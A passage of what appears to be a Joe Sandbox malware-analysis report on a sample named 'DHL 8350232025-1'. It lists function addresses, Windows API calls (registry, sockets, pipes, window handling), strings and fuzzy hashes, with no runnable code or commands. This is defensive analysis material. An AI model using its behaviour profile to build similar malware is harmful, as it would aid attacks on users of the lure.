_wcslen.LIBCMT ref: 0020D01B
SHFileOperationW.SHELL32(?), ref: 0020D061

Strings

\*.*, xrefs: 0020CFF3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 06ca69201045b9a0c15c1ed7e5a53a467adcd1923d82f0b99b05aa8dd64b006a
Instruction ID: f00bdfcd643699559e98f43828264cf9aa0d5c817fb8ecb2f8488f39e53c6aea
Opcode Fuzzy Hash: 06ca69201045b9a0c15c1ed7e5a53a467adcd1923d82f0b99b05aa8dd64b006a
Instruction Fuzzy Hash: C54167B18152195FDF12EFA4D985ADEB7B9AF18340F1000E6E505E7182EB34A694CF51

Function 00232DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00232E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00232E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00232E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00232EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00232EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00232EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00232F0B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: adf52c07ae1d64fb7bb71922b8ab5994f4541dc87e1b2dea3b18f4d5492ba3ab
Instruction ID: ca39ea638453afac642717d024473884535b1bb3991ad8e00b48eafbb39c8d64
Opcode Fuzzy Hash: adf52c07ae1d64fb7bb71922b8ab5994f4541dc87e1b2dea3b18f4d5492ba3ab
Instruction Fuzzy Hash: E4311371614251EFDB21CF18EC8AF6537E4EB8AB10F240164FA049B2B2CB71B8A5DB40

Function 00207726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00207769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0020778F
SysAllocString.OLEAUT32(00000000), ref: 00207792
SysAllocString.OLEAUT32(?), ref: 002077B0
SysFreeString.OLEAUT32(?), ref: 002077B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002077DE
SysAllocString.OLEAUT32(?), ref: 002077EC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 5ea21258f7c2d3c7f258b80c6b4a6d479714e78dd559606db041d89d6053a6ca
Instruction ID: a7d8a84bab9a6b13c6a427582620602fe377e731d413ca8d278416540e28eef5
Opcode Fuzzy Hash: 5ea21258f7c2d3c7f258b80c6b4a6d479714e78dd559606db041d89d6053a6ca
Instruction Fuzzy Hash: E621C476A14319AFDF10EFA8DC88CBBB3ACEB093A47108025FA04DB1A1D770EC518760

Function 002077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00207842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00207868
SysAllocString.OLEAUT32(00000000), ref: 0020786B
SysAllocString.OLEAUT32 ref: 0020788C
SysFreeString.OLEAUT32 ref: 00207895
StringFromGUID2.OLE32(?,?,00000028), ref: 002078AF
SysAllocString.OLEAUT32(?), ref: 002078BD

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 39253a732191a315fac35d42cf78f30fcd141d6c9b243af9076e7653f421db1f
Instruction ID: 5ac77aa757c45beb3e4be62a4fd6b05c91d58a000c50df457f48977bde65f417
Opcode Fuzzy Hash: 39253a732191a315fac35d42cf78f30fcd141d6c9b243af9076e7653f421db1f
Instruction Fuzzy Hash: A1216232A18205AFDB10AFA8DC8CDAA77ACEB097607108125FA15DB2A1D774EC51DB64

Function 002104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002104F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0021052E

Strings

nul, xrefs: 00210567

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a757c8f4b34403c41d5515d632ef3cbbf985731c67f0a579f4871a985a600cec
Instruction ID: a5f376ffb75e4dfdb6a63825f597ea5db6d467f7bc842865a48dd1b78bcb14c8
Opcode Fuzzy Hash: a757c8f4b34403c41d5515d632ef3cbbf985731c67f0a579f4871a985a600cec
Instruction Fuzzy Hash: 4F218571510306ABDB205F29DC88ADA77E5BF54724F604A19FCA1E61D0D7F099E0CF20

Function 002105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002105C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00210601

Strings

nul, xrefs: 00210639

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 5d988e0d6aef9e4186e36245a9bd67568be98f1dc1ce1d4e5cfb08bc8312e81e
Instruction ID: 3d2b7062f5b210efe471c97b980448b4cf9d012b2cf333a99b2142474cc7abb4
Opcode Fuzzy Hash: 5d988e0d6aef9e4186e36245a9bd67568be98f1dc1ce1d4e5cfb08bc8312e81e
Instruction Fuzzy Hash: 3B2153755103469BDB209F699C88ADA77E8BFA5720F204A19FCA1E72D0D7F099F0CB50

Function 002340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001A604C
Part of subcall function 001A600E: GetStockObject.GDI32(00000011), ref: 001A6060
Part of subcall function 001A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00234112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0023411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0023412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00234139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00234145

Strings

Msctls_Progress32, xrefs: 002340E3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: ce9417f8c69dda23e06e8f0725b1b8e3eb15fff82f5b43ab4bdd7fd0922dcdb7
Instruction ID: 4f93013ce4e3fde4e3b1e7fa25a3cb30b0c085902ea0416147fb7c92dd39abdd
Opcode Fuzzy Hash: ce9417f8c69dda23e06e8f0725b1b8e3eb15fff82f5b43ab4bdd7fd0922dcdb7
Instruction Fuzzy Hash: 5411B2B215021ABEEF119F64CC86EE77F6DEF09798F014111FA58A6050CB729C61DBA4

Function 001DD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001DD7A3: _free.LIBCMT ref: 001DD7CC

_free.LIBCMT ref: 001DD82D

Part of subcall function 001D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000), ref: 001D29DE
Part of subcall function 001D29C8: GetLastError.KERNEL32(00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000,00000000), ref: 001D29F0

_free.LIBCMT ref: 001DD838
_free.LIBCMT ref: 001DD843
_free.LIBCMT ref: 001DD897
_free.LIBCMT ref: 001DD8A2
_free.LIBCMT ref: 001DD8AD
_free.LIBCMT ref: 001DD8B8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: cbc18e0a9550c0fe51c718776e67c20982726d44ffdfc239b5484901b739cfee
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 5E115E71540B14AAD621BFF0DC47FCB7BDCAF20704F400826F2ADA6292DB75B5059661

Function 0020DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0020DA74
LoadStringW.USER32(00000000), ref: 0020DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0020DA91
LoadStringW.USER32(00000000), ref: 0020DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0020DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0020DAB9

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: b6c23032227471da425e6df53002bee1bd1e409757576a5b0a78d65a2b5c132c
Instruction ID: 1445a81f81f4a738d42bd7515ee23294549e3c83f82a3b79da34bcc59ed056c2
Opcode Fuzzy Hash: b6c23032227471da425e6df53002bee1bd1e409757576a5b0a78d65a2b5c132c
Instruction Fuzzy Hash: 350162F29102087FE7109BA4AD8DEE7726CE708301F500896B746F2082EA749E844F74

Function 0021096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(010EE630,010EE630), ref: 0021097B
EnterCriticalSection.KERNEL32(010EE610,00000000), ref: 0021098D
TerminateThread.KERNEL32(010EE628,000001F6), ref: 0021099B
WaitForSingleObject.KERNEL32(010EE628,000003E8), ref: 002109A9
CloseHandle.KERNEL32(010EE628), ref: 002109B8
InterlockedExchange.KERNEL32(010EE630,000001F6), ref: 002109C8
LeaveCriticalSection.KERNEL32(010EE610), ref: 002109CF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e7c0dfa24f4604dfa848b7c593a06991587c537c458fbad97a9dcf4559c3fd7d
Instruction ID: 5575cd7480b1d3479e5c05c1328931c0018b26decd6ed63535ff658833151c36
Opcode Fuzzy Hash: e7c0dfa24f4604dfa848b7c593a06991587c537c458fbad97a9dcf4559c3fd7d
Instruction Fuzzy Hash: 02F0CD31442512ABD7515F94EE8DAD67A65BF05702F501025F501608A1C7B5A4B5CF90

Function 00221C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00221DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00221DE1
WSAGetLastError.WSOCK32 ref: 00221DF2
htons.WSOCK32(?,?,?,?,?), ref: 00221EDB
inet_ntoa.WSOCK32(?), ref: 00221E8C

Part of subcall function 002039E8: _strlen.LIBCMT ref: 002039F2

Part of subcall function 00223224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0021EC0C), ref: 00223240

_strlen.LIBCMT ref: 00221F35

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: a8417e44b209ea12c7b861e6624012be72f037923c034e362008f88ca24c9f85
Instruction ID: 69c0baee267d642d53938deabd1c6579126ca9c8f2b9ab0da5d75052c8f0f237
Opcode Fuzzy Hash: a8417e44b209ea12c7b861e6624012be72f037923c034e362008f88ca24c9f85
Instruction Fuzzy Hash: 8CB11034204311AFC324DF64D885E2A7BE5AFA5318F58894CF46A5F2E2CB71ED52CB91

Function 001A5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 001A5D30
GetWindowRect.USER32(?,?), ref: 001A5D71
ScreenToClient.USER32(?,?), ref: 001A5D99
GetClientRect.USER32(?,?), ref: 001A5ED7
GetWindowRect.USER32(?,?), ref: 001A5EF8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 178e3d79a8e347d303cfc7b14ce412f11b6f6008a04f0c2dbeaee934c59ecf84
Instruction ID: 0afffcc8ed970560bc2ad7d3e0fb24401abd1a25fb5a791b2d8b95edef4002c6
Opcode Fuzzy Hash: 178e3d79a8e347d303cfc7b14ce412f11b6f6008a04f0c2dbeaee934c59ecf84
Instruction Fuzzy Hash: E5B17B39A04B8ADBDB14CFA9C4407EEB7F2FF58310F14841AE8A9D7250DB34AA51DB54

Function 001D01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 001D00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D00D6
__allrem.LIBCMT ref: 001D00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D010B
__allrem.LIBCMT ref: 001D0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D0140

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 4b0162c3defa73debad09faea933bf64313f38eb058c32900e9d06167ff5d322
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: BF81E372A00B06ABE7259A69CC82B6B73E9EF65364F25423FF411D7381E770D9018790

Function 001D61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001C82D9,001C82D9,?,?,?,001D644F,00000001,00000001,8BE85006), ref: 001D6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001D644F,00000001,00000001,8BE85006,?,?,?), ref: 001D62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001D63D8
__freea.LIBCMT ref: 001D63E5

Part of subcall function 001D3820: RtlAllocateHeap.NTDLL(00000000,?,00271444,?,001BFDF5,?,?,001AA976,00000010,00271440,001A13FC,?,001A13C6,?,001A1129), ref: 001D3852

__freea.LIBCMT ref: 001D63EE
__freea.LIBCMT ref: 001D6413

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7e31dba642cf104dc07465e2cd0c0d8f56c6881c7bcfa5f83b17535776c4791d
Instruction ID: 45c2507b0b41a17764cb693653e0b73d931ff5ce1dd89df192d788711326c50a
Opcode Fuzzy Hash: 7e31dba642cf104dc07465e2cd0c0d8f56c6881c7bcfa5f83b17535776c4791d
Instruction Fuzzy Hash: CD51B072A00216BBEB258F64DC81EAF77A9EB54750F25472AFC09D6241EB34DC44D6A0

Function 0022BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 0022C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0022B6AE,?,?), ref: 0022C9B5
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022C9F1
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022CA68
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0022BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0022BD25
RegCloseKey.ADVAPI32(00000000), ref: 0022BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0022BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0022BDF3
RegCloseKey.ADVAPI32(?), ref: 0022BDFF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 6e9e755a9514af9e0b7c0e54f63a3029348949be4f771d5ac8ae476a8b566867
Instruction ID: ecd1e9c665cdcc431c8708666cb679410c38071ca05246027879dca62a36db01
Opcode Fuzzy Hash: 6e9e755a9514af9e0b7c0e54f63a3029348949be4f771d5ac8ae476a8b566867
Instruction Fuzzy Hash: 1F81FE34228241EFC715DF64D885E6ABBE5FF85308F14886CF4598B2A2CB31ED45CB92

Function 001FF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 001FF7B9
SysAllocString.OLEAUT32(00000001), ref: 001FF860
VariantCopy.OLEAUT32(001FFA64,00000000), ref: 001FF889
VariantClear.OLEAUT32(001FFA64), ref: 001FF8AD
VariantCopy.OLEAUT32(001FFA64,00000000), ref: 001FF8B1
VariantClear.OLEAUT32(?), ref: 001FF8BB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: f170d8e8d9f4c9f2c0ddad038ab0a68d7e1b4730ff62c2b539abe14eb49ad86e
Instruction ID: 52688fbd250527d02bc7e5cf3d8dab7894b64938c9d386c6f725d25bc3d6a9ab
